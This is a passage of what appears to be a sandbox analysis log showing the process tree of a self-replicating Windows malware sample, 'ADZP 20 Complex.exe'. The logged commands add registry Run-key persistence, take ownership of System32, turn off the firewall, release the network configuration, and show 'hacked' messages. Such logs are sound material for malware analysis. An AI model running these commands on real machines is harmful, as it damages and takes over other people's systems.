C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:1424
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:13640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9688
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6652
-
-
C:\Windows\system32\calc.execalc5⤵PID:516
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6508
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:5804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8612
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:8636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8672
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:9020
-
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:4908
-
-
C:\Windows\system32\calc.execalc3⤵PID:5080
-
-
C:\Windows\explorer.exeexplorer.exe3⤵PID:3944
-
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵PID:1012
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵PID:1372
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\55B1.tmp\55B2.tmp\55B3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵PID:348
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:3080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5416
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵PID:5856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵PID:5972
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
PID:4508
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵PID:4140
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵PID:1568
-
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:3092
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
PID:5160
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*5⤵
- Views/modifies file attributes
PID:5360
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:4880
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:4144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:6004
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:4336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:2056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:6132
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5044
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:2020
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:4524
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:5628
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:3912
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵PID:5828
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:1648
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B258.tmp\B259.tmp\B25A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6192
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:3392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:3616
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:9072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:8848
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Modifies file permissions
PID:2536
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:5040
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8972
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:2312
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:9916
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:5128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12756
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:8920
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:13504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:3792
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12420
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:9524
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:14044
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:14128
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:12312
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\223F.tmp\2240.tmp\2241.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:14184
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:5936
-
-
C:\Windows\system32\calc.execalc7⤵PID:13524
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:2300
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:7004
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:8692
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2164.tmp\2165.tmp\2166.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:8232
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:6444
-
-
C:\Windows\system32\calc.execalc7⤵PID:9688
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:7312
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:11044
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:9296
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\21F1.tmp\21F2.tmp\21F3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11584
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:5872
-
-
C:\Windows\system32\calc.execalc7⤵PID:220
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:10660
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:1028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12720
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:14496
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:3944
-
-
C:\Windows\system32\calc.execalc5⤵PID:5828
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6152
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6248
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6312
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B788.tmp\B789.tmp\B78A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7492
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:7444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:5636
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8464
-
-
-
C:\Windows\SysWOW64\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8496
-
-
C:\Windows\SysWOW64\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8648
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:8908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:7324
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:9064
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:1860
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:6064
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9356
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9444
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9644
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9664
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9896
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10100
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10124
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5732
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:1976
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D443.tmp\D444.tmp\D454.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:10256
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13132
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:14196
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9C84.tmp\9C85.tmp\9C86.bat C:\Windows\System32\Twain_20.dll"11⤵PID:11468
-
-
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:15140
-
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:11128
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:8972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:11880
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:10544
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:13264
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:7264
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:9624
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:15076
-
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad7⤵PID:7336
-
-
C:\Windows\SysWOW64\calc.execalc7⤵PID:10508
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe7⤵PID:10580
-
-
C:\Windows\SysWOW64\mspaint.exemspaint.exe7⤵PID:10692
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:10840
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EE43.tmp\EE54.tmp\EE55.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13784
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:9296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:8268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:7144
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:9372
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:14900
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:9164
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:15068
-
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad7⤵PID:10956
-
-
C:\Windows\SysWOW64\calc.execalc7⤵PID:11148
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe7⤵PID:11248
-
-
C:\Windows\SysWOW64\mspaint.exemspaint.exe7⤵PID:8960
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:7508
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7F5.tmp\7F6.tmp\7F7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:8036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:8048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:10196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:12056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:13148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:12592
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:7600
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:9272
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:6488
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:7852
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:12440
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*9⤵
- Views/modifies file attributes
PID:7124
-
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad7⤵PID:7340
-
-
C:\Windows\SysWOW64\calc.execalc7⤵PID:7672
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe7⤵PID:7980
-
-
C:\Windows\SysWOW64\mspaint.exemspaint.exe7⤵PID:10368
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:8888
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10092
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:12836
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:4404
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:1152
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6456
-
-
C:\Windows\system32\calc.execalc5⤵PID:6628
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6644
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6808
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:7008
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C64D.tmp\C64E.tmp\C64F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:7276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:1376
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:8172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:5708
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8376
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8452
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8580
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:8848
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:8648
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:5572
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:8688
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:2412
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10884
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:8460
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:11172
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:5584
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:9160
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:11416
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3F90.tmp\3FDF.tmp\3FE0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11928
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:11620
-
-
C:\Windows\system32\calc.execalc7⤵PID:11784
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:12088
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:11116
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:12352
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\67F7.tmp\67F8.tmp\67F9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:13176
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:5264
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:7268
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B22F.tmp\B230.tmp\B231.bat C:\Windows\System32\Twain_20.dll"11⤵PID:6748
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd12⤵PID:1448
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll13⤵PID:14688
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4497.tmp\4498.tmp\4499.bat C:\Windows\System32\Twain_20.dll"14⤵PID:14168
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵
- Modifies Windows Firewall
PID:12844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd12⤵PID:14436
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"12⤵PID:6300
-
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:11556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:3868
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:12260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:6820
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:9464
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:13384
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:12480
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:14452
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
